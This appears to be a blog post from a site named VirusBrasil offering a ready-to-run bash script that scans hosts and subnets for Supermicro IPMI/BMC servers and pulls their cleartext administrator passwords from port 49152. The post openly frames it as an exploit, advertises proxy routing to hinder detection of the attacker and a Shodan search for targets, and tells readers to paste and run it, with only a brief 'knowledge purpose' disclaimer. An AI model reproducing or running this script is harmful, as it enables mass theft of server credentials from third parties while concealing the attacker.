Scanner Failures SuperMicro Servers IPMI/BMC, Exploit Code Here

As we know a few days ago was discovered a flaw that exposes more than 32,000 administrative passwords of servers using the Supermicro motherboard, these passwords are exposed with access from the port 49152.

Today I bring an exploit able to find these vulnerable machines.

This script automates the exploitation of the vulnerability that exposes passwords in plain text format of these machines.

This tool can check sub-networks, individual hosts and even includes the option of using proxy hindering the detection of the attacker and not simply also have the option to search the fault via SHODANHQ

Just copy the code below and paste it into a file with the name "supermicro_scan.sh"

Remembering This script is for users of LINUX.

#!/bin/bash
# Supermicro IPMI/BMC Cleartext Password Scanner v20140622
# Seguranca da Informacao VB/CG
# Usage: sh supermicro_scan.sh <CIDR|IP|showdan> [proxy]
#
# ABOUT:
# Supermicro’s implementation of IPMI/BMC allows remote, unauthenticated attackers to
# request the file PSBlock via port 49152. This plain text password file contains IPMI
# username and password information. This script allows users to scan their networks
# check for vulnerable systems that require patching.
#
# Como Utilizar:
# ./supermicro_scan.sh 74.200.8.237 – Single host scan
# ./supermicro_scan.sh 74.200.0.0/16 proxy – Subnet scan with proxy
# ./supermicro_scan.sh showdan – Search for vulnerable servers on ShowdanHQ
#

clear
echo “(–==== Seguranca da Informacao VB/CG”
echo “(–==== Supermicro IPMI Cleartext Password Scanner”
echo “”

UNICORNSCAN=`which unicornscan`
CURL=`which curl`
PROXYCHAINS=`which proxychains`
TARGET=$1
PROXY=$2

if [ "$UNICORNSCAN" == "" ]; then
echo “(–==== Unicornscan nao instalado Saindo …”
exit
fi

if [ "$PROXYCHAINS" == "" ]; then
echo “(–==== Proxychains nao instalado varredura Continuando sem suporte a proxy…”
exit
fi

if [ "$CURL" == "" ]; then
echo “(–==== Curl nao esta instalado! Saindo …”
exit
fi

if [ -z "$1" ]; then
echo “(–==== Usage: $0 <CIDR|IP> [proxy]”
exit
fi

if [ $TARGET == "shodan" ]; then
# SCAN USING SHODANHQ SEARCH
echo “Buscando ShowdanHQ…”
iceweasel http://www.shodanhq.com/search?q=Content-Length%3D3269 &
exit
fi

if [ "$PROXY" = "proxy" ]; then
#PROXY ENABLED
echo “(–==== Scanning via proxy…”
# SCAN FOR THE DEFAULT FILES AND PORTS
for a in `unicornscan -p 49152 $TARGET 2>/dev/null | awk ‘{print $5}’`; do
echo “(–==== Extraindo Usuario e senha from $a”
echo “(–==== Sending GET http://$a:49152/PSBlock”
proxychains curl http://$a:49152/PSBlock -m 3 –retry 1 -f -# | strings
done
exit

else
# NO PROXY
echo “(–==== Scanning via conexao direta…”
# SCAN FOR THE DEFAULT FILES AND PORTS
for a in `unicornscan -p 49152 $TARGET 2>/dev/null | awk ‘{print $5}’`; do
echo “(–==== Extraindo usuario e senha from $a”
echo “(–==== Sending GET http://$a:49152/PSBlock”
curl http://$a:49152/PSBlock -m 3 –retry 1 -f -# | strings
done
exit

fi

echo “”
echo “(–==== Scan Completo!”
exit

Disclaimer: "This code is use for Knowledge purpose only."

Source: VirusBrasil